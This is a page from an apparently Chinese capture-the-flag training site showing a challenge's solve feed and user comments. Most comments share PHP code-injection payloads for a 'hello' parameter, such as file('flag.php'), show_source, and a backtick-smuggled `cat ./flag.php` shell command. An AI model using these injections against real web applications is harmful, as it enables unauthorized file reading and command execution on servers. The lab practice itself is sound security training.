评分(10)
解题动态
cccjfddfgyd 攻破了该题 9小时前
hsk_zy 攻破了该题 10小时前
yogalin 攻破了该题 10小时前
main123 攻破了该题 10小时前
k12g 攻破了该题 11小时前
li3427379304 攻破了该题 14小时前
呢称被我吃掉了 攻破了该题 16小时前
haduck 攻破了该题 18小时前
xiao ovo 攻破了该题 19小时前
笛安丶 攻破了该题 20小时前
进击的鱼尾 攻破了该题 1天前
1112223 攻破了该题 1天前
jjjdas 攻破了该题 1天前
nanaqilin 攻破了该题 1天前
小白RM 攻破了该题 1天前
xc8888888 攻破了该题 1天前
tschick 攻破了该题 1天前
哈哈1 攻破了该题 1天前
一骑绝尘 攻破了该题 1天前
评论
l03h11x28 4年前
举报
这题是不是不能做了啊 卧槽 为啥我不显示 坑我两块钱 rnm退钱!!!
118234 4年前
举报
`cat /flag`
luoyao 4年前
举报
?hello=file("flag.php")
luyisie 4年前
举报
file // show_source // highlight_file
wwgy9981 4年前
举报
flag = 'Too Young Too Simple‘
kavin 4年前
举报
明白了原理,用bp搞了一轮,发现hello=show_source('flag.php')可行
kuaiting 4年前
举报
使用?hello=file('flag.php') 或者?hello=show_source('flag.php') 等可以读取源码的函数 或者构造var_dump($a) 闭合
陈江川0118 4年前
举报
简单来说就是利用file函数把flag.php的内容存到一个数组中,然后打印出来数组的内容即可
trackboy 4年前
举报
?hello=file(%22flag.php%22) ?hello=file_get_contents(%27flag.php%27) ?hello=1);show_source(%27flag.php%27);var_dump( ?hello=);echo%20`cat%20./flag.php`;//
lgb236277484 4年前
举报
highlight_file()